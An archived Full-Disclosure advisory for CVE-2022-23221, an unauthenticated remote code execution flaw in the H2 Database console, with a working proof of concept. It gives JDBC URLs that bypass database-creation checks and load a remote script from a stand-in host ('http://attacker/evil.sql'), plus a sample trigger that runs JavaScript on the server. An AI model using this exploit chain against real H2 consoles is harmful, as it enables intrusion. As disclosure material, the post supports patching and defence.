lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Message-ID: <CA+FEC02jmBSX9Brbc3sUvDG8Yv-P+9XvEaY1G7ZR7SKhRwhMKA@mail.gmail.com>
Date: Wed, 19 Jan 2022 11:17:49 -0500
From: Ismail Aydemir <me@...ail.email>
To: fulldisclosure@...lists.org
Subject: [FD] Unauthenticated RCE vuln in the H2 Database console:
	CVE-2022-23221.

Document Title
===============
Unauthenticated RCE vuln in the H2 Database console: CVE-2022-23221.

Product Description
===============
The H2 Console Application

The Console lets you access a SQL database using a browser interface.

Homepage: http://www.h2database.com/html/quickstart.html
Affected Components
===============
File Name: WebServer.java
File Path: /h2database/h2/src/main/org/h2/server/web/WebServer.java
Impacted Function: getConnection

PoC
===============

1) Navigate to the console and attempt to connect to a H2 in memory
database that does not exist using the following JDBC URL:

```
jdbc:h2:mem:1337;
```

2) Note that you get the following security exception preventing you
from creating a new in memory database:

```
Database "mem:1337" not found, either pre-create it or allow remote
database creation (not recommended in secure environments) [90149-209]
90149/90149 (Help)
```

3) Now try again with the following JDBC URL:

```
jdbc:h2:mem:1339;IGNORE_UNKNOWN_SETTINGS=TRUE;FORBID_CREATION=FALSE;'\
```

4) Note that you were able to successfully create a new in memory database
5) Create a SQL file that contains a trigger that executes
java/javascript/ruby code when executed and host it on a domain you
control (ex: http://attacker)
6) Use the following JDBC URL to execute the SQL file hosted on your
domain on connect:

```
jdbc:h2:mem:1337;IGNORE_UNKNOWN_SETTINGS=TRUE;FORBID_CREATION=FALSE;INIT=RUNSCRIPT
FROM 'http://attacker/evil.sql';'\
```

Example evil.sql file:

```
CREATE TABLE test (
     id INT NOT NULL
 );

CREATE TRIGGER TRIG_JS BEFORE INSERT ON TEST AS '//javascript
var fos = Java.type("java.io.FileOutputStream");
var b = new fos ("/tmp/pwnedlolol");';

INSERT INTO TEST VALUES (1);
```

CVE Issued: CVE-2022-23221

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ